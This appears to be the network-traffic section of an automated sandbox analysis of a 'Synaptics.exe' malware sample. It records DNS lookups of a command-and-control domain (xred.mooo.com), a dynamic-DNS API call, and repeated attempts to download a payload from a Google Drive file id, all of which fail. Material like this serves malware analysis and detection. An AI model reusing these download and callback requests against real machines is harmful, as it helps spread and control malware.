                                                                                                                Dec 30, 2024 10:58:20.970328093 CET192.168.2.71.1.1.10x77d4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:26.657561064 CET192.168.2.71.1.1.10x5f73Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:33.522968054 CET192.168.2.71.1.1.10x4b3eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 30, 2024 10:58:08.762170076 CET1.1.1.1192.168.2.70xff7cNo error (0)docs.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.596779108 CET1.1.1.1192.168.2.70x7d74Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.612328053 CET1.1.1.1192.168.2.70xbff3No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.829541922 CET1.1.1.1192.168.2.70x570dNo error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:16.235618114 CET1.1.1.1192.168.2.70xe367Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:20.977950096 CET1.1.1.1192.168.2.70x77d4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:26.664838076 CET1.1.1.1192.168.2.70x5f73Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:33.530014992 CET1.1.1.1192.168.2.70x4b3eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                • docs.google.com
                                                                                                                • drive.usercontent.google.com
                                                                                                                • freedns.afraid.org
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.74970869.42.215.252807412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 30, 2024 10:58:09.618555069 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                User-Agent: MyApp
                                                                                                                Host: freedns.afraid.org
                                                                                                                Cache-Control: no-cache
                                                                                                                Dec 30, 2024 10:58:10.203069925 CET243INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                Vary: Accept-Encoding
                                                                                                                X-Cache: MISS
                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749704216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:09 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZYVWoasOPS1ZSSUjTP-vJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.749705216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:09 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-b8TBxOJkFgJx9yvH1KXdLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.749709216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NMo4d2pwopBYogv37RGpCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.749710142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:10 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-12-30 09:58:10 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5r8jFWtqrVC47XzG0fLubod6JG3bxMGlzbjdG6MT86GGvmDeWf1cnhr2RzOiOCJsXt
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7bGKJL25SjQ8hx360BBjSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Set-Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:10 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 69 51 6a 4f 50 49 54 56 79 38 6b 50 5a 68 44 45 56 6e 59 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aiQjOPITVy8kPZhDEVnYTg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                2024-12-30 09:58:10 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.749712216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZMZ-_af7m91UULobl8DFhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.749711142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:10 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-12-30 09:58:10 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC663tgRnkqqN787wYQ3matvlwMsm5wevAfHC0S5rpdEh5DDnXrgF4qXbAR8WR5q7adbtZSHZDg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QxegUZUaDyF2AlpyjvksSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Set-Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:10 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 6b 68 4d 39 37 65 4f 35 45 43 75 74 71 68 36 39 71 41 5f 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hkhM97eO5ECutqh69qA_Tg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                2024-12-30 09:58:10 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.749715216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MMgcadZ8VtivJMlYv8SVLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.749717142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                                                                                                2024-12-30 09:58:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7MB96Lkeyx-FmIhD6UNY6xLL_0ATJUp6WjydE2YeNEHkUQghgIaSY9soQegw1aSSV-zNCBMEA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:12 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CxH4l8hdfzGl71dsvLTM4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 6e 30 77 7a 50 4c 41 57 69 75 66 43 38 79 4d 39 45 33 45 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="on0wzPLAWiufC8yM9E3EoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


